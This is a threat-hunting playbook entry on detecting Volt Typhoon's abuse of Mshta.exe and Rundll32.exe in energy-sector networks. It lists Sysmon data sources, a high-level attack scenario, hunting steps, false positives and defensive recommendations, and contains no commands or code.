Volt Typhoon against energy etc.

Attackers may be using Mshta.exe or Rundll32.exe to execute malicious code.

Name:
Volt Typhoon against energy etc.

TTP:
T1218.005 System Binary Proxy Execution: Mshta, T1218.011 System Binary Proxy Execution: Rundll32

Hypothesis:

Attackers may be using Mshta.exe or Rundll32.exe to execute malicious code.

Campaign Type:
Data Driven

Data Sources:

  • Process Monitoring (Sysmon Event ID 1)
  • Process Command-Line Parameters (Sysmon Event ID 1)
  • Loaded DLLs (Sysmon Event ID 7)
  • Windows Registry (Security Event ID 4663)

Tools:

  • Sysmon
  • Process Monitor
  • PowerShell Arsenal

Scenario:

  1. Initial Access: Attacker gains initial access through phishing or other means.
  2. Defense Evasion: Attacker uses MSHTA or Rundll32 to execute malicious code and evade detection.
     
  3. Persistence: Attacker establishes persistence on the compromised system.
  4. Privilege Escalation: Attacker elevates privileges to gain higher-level access.
  5. Lateral Movement: Attacker moves laterally to other systems within the network.
  6. Exfiltration: Attacker exfiltrates sensitive data from the compromised environment.
  7. Impact: Attacker achieves their objective, such as data theft, disruption of services, or financial gain.

Hunting Strategy:

  1. Data Analysis: Analyze the collected data sources for suspicious executions of MSHTA or Rundll32.
     
  2. Event Correlation: Correlate process creation events with module loads and registry accesses to identify related activity.
     
  3. Outlier Investigation: Investigate any outliers or suspicious events that deviate from the established baseline.
  4. Threat Validation: Validate potential threats by examining the full command line of the process, the loaded DLLs, and the accessed registry keys.   
     
  5. Remediation: Isolate the compromised systems, terminate the malicious processes, and remove any persistence mechanisms.
  6. Reporting: Document the findings of the threat hunt, including the IOCs, TTPs, and the attack timeline.

False Positive Consideration:

  • Legitimate use of MSHTA or Rundll32 by system administrators or users.
  • Automated scripts or tools that utilize these executables for benign purposes.

Recommendations:

  • Implement application control rules to restrict the use of MSHTA and Rundll32.
  • Monitor for suspicious command-line parameters and loaded DLLs associated with these executables.
  • Educate users and administrators about the risks of executing untrusted HTA files.

D3 Diagram:

Leave a Reply